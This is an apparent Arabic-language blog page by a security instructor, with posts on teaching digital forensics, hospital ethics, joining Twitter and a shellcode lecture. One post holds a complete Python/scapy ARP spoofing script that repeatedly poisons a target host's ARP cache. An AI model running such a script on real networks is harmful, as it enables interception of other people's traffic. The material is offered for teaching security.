About [email protected]

L!nux rul3z aLL

شرلوك هولمز الرقمي

لم أجد الفراغ المناسب لأكتب عن هذه التدوينة وماذا تعني … ولكني عُدت قبل بضع ساعات من عملي وقلت أكتب عن الأمر قبل أن أنساه بالكامل!

digital-forensics

قبل حوالي أسبوعين أو أكثر على ما أذكر تم الإتفاق معي على أن أقوم الفصل الدراسي القادم (الفصل الثاني للعام الدراسي 2012/2013) بتدريس مادة Digital Forensic Investigation لطلاب الماجستير كذلك … المادة سوف أكتب عن تفاصيلها بالقريب العاجل حال إنتهائي من هذا الفصل الدراسي الحالي والذي قارب على الإنتهاء … المادة ستكون عن كل ما يخص التحقيقات الجنائية الرقمية … المادة لن تكون نظرية فقط بدون شك، لأني إنسان يعشق كل ما هو تقني فالجانب التقني بإذن الله سيكون حاضراً كذلك … كما ذكرت سأكتب عن جميع تفاصيل المادة قريباً إن شاء الله …
Continue reading

الإجرام الأخلاقي!

سمعنا عن الإختراق الأخلاقي … ولكن هذا الموضوع مختلف تماماً ولا علاقة له بالإختراق ولا بالأختراق الأخلاقي … هذا الموضوع يتحدث عن الإجرام الأخلاقي الجديد في عالمنا العربي … مجتمعاتنا العربية للأسف يسودها الأمراض والتراجع الفكري والأخلاقي من عام الى عام الى الخلف … لا أخلاق ولا قييم … كلها باتت مجرد خزعبلات وأوهام وقصص من الماضي … اليوم نحن نعيش عصر جديد من القذارة والإنحطاط للأسف … بالأمس عدت من دفن والدة أحد الأصدقاء (رحمة الله عليها) والتي صارعت المرض في المستشفى وفي البيت … المستشفيات والأطباء أصبحوا بدون قلوب وبدون رحمة … من كنا نسميهم ملائكة الرحمة باتوا مجرمين بكل ما تحمله الكلمة من معنى … لكن مجرمين “أخلاقيين” !!!

المرأة علم الأطباء وعلمت المستشفى بإن المرأة حالتها منتهية ولا يمكن أن يتم علاجها … أولاً هي كبيرة جداً بالسن وثانياً جميع الإجرائات الطبية تم مراجعتها والتأكد من إن المستشفى والأطباء غير قادرين على عمل شيء وإنه حان الآوان لترقد الإمراءة بسلام في فراشها … ولهذا كان على هؤلاء جميعهم أن يخبروا أهل المرأة بإنه يجب إخراجها من المستشفى وجعل المرأة ترتاح في منزلها وحولها أولادها وأحبابها … لا أن تبقى في المستشفى من أجل الإهداف الأخرى:
1- حجز غرفة لمريض (الغرفة بثمن مبالغ به، ولا حتى فندق خمس نجوم … طبعاً السعر بالليلة) !!!
2- حجز معدات طبية لحالة المرأة (كل جهاز له سعر وثمن مختلف وأيضاً حسب الليلة)!!! Continue reading

خطوة للأمام أم للخلف (إستعمال Twitter)؟!

twitter-logo-cute-bird

منذ فترة طويلة من الزمن وأفكر بإستعمال خدمة Twitter بالذات … وذلك بسبب كون العديد من الأخوة والأصدقاء دائماً يسألونني عنها، وعن سهولة المتابعة من خلالها … ولهذا صراحة قمت بعمل حساب عليه … أضطررت الى عمل حساب بإسم binaryz0ne وذلك لأنه يبدو هناك من سبقني للأسماء الأخرى … على كل حال اتمنى أن أستطيع أن أتواصل مع الجميع من خلال هذه الخدمة، وكذلك أن تكون خطوة جيدة نحو الأمام وليس خطوة سيئة تعيدني الى الخلف … سأحتاج الى بعض الوقت للتعود والتأقلم عليه وكذلك للتعرف على كيفية إستعماله …

شكراً للجميع …

سكربت بسيط لعمل ARP Spoofing

سكربت بسيط لعمل ARP Spoofing … قم بنسخ الكود وتشغيله او تحميله من صفحة المشاريع (هنا) …

#!/usr/bin/env python
import sys, time
from scapy.all import sendp, ARP, Ether

if len (sys.argv) < 4:
	print "Usage\n:"
	print sys.argv[0] + "   "
	print "./arpSpoofer.py eth0 192.168.1.56 192.168.1.100"	
	sys.exit (1)

networkInterface = str(sys.argv[1])
targetIPAddr = sys.argv[2]
spoofedIPAddr = sys.argv[3]

# Assembling the Spoofed Packet
spoofedPacket = Ether() / ARP(pdst=targetIPAddr, psrc=spoofedIPAddr, op="is-at")

# Start Spoofing (aka Poisoning) :)
while True:
	sendp(spoofedPacket, iface=networkInterface)
	time.sleep (1)

المزيد من التجارب في الطريق إن شاء الله :)

مقدمة عن الـ Shellcodes لمحاضرة HTID

كما قلت في أحد ردودي في مجتمع لينُكس العربي بإني سأقوم بإعداد محاضرة بسيطة عن الـ Shellcodes وذلك لأني وجدت الكثير من طلابي لا يعرفون كثيراً عنها، ولا ما هي أنواعها ومتى نستعمل كل واحدة منها … ولذلك قمت بإعداد هذه المادة البسيطة جداً، لا يوجد فيها كتابة Shellcode ولكن توضيح لمعناهم وماذا نعني عندما نسمع كلمة Opcode … في نهاية المحاضرة هناك توضيح لأهم الأمور التي يجب أن نأخذها بعين الإعتبار حين نقوم بإستعمال أو عمل Shellcode … أيضاً وضعت Template يسهل عليك عملية تحليل أي Shellcode قمت بتحميله من الأنترنت … يعني يسهل عليك عملية الـ Debugging له وذلك لمعرفة مالذي يقوم به … هناك كذلك بعض الأدوات التي أراها مفيدة للغاية وبدون شك مصادر لمواقع رائعة ومفيدة للغاية وبدون شك بدون الإستغناء عن بعض الكتب التي يجب ان تكون بحوزتك :)

تجدون ذلك في الصفحة الخاصة بالمحاضرات هذه … هنا

خارج النص: فكرت قبل فترة بالتسجيل لإمتحان OSCE وذلك لكي أجبر نفسي على العمل والدراسة أكثر وكذلك بعد نهاية العمل نحصل على شهادة … تجاوزت كل شروط وإمتحانات القبول ولكن أنصدمت إنه لا يحق لي الإشتراك في الإمتحان مباشرة وإنما يجب ان أقوم بشراء الدورة CTP بالبداية … شيء محبط صراحة، ومبلغ الدورة ليس بالبسيط ولماذا أشتري شيء لست بحاجة له !!! على كل حال سوف أحاول أن أخوضها في القريب العاجل …

على كل حال أتمنى تعجبكم محاضرة الـ Shellcode … والتي كانت جزء من محاضرة الـ Exploitation Demo …